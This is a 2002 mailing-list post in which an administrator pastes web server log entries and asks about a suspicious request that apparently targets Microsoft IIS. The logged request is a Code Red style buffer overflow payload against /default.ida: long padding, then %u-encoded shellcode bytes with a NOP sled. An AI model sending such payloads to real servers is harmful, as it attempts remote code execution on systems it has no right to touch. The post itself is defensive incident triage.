[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] "GET /default.ida?NNNNNNNN (attack)
- Subject: [cobalt-security] "GET /default.ida?NNNNNNNN (attack)
- From: "Nicolae" <nicolaep@xxxxxxxxxxxxxxxxxx>
- Date: Mon, 11 Mar 2002 18:19:43 -0800
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Anyone can shed some light on this. It looks like a WindowZ IIS
type of attempt.
127.0.0.1 - - [10/Mar/2002:19:45:01 -0800] "HEAD / HTTP" 200 0 "-" "-"
64.152.63.110 - - [10/Mar/2002:19:58:16 -0800] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-"
127.0.0.1 - - [10/Mar/2002:20:00:00 -0800] "HEAD / HTTP" 200 0 "-" "-"
127.0.0.1 - - [10/Mar/2002:20:15:00 -0800] "HEAD / HTTP" 200 0 "-" "-"
Ps. I left the IP listed on purpose.
--
EnigmaBiz.Com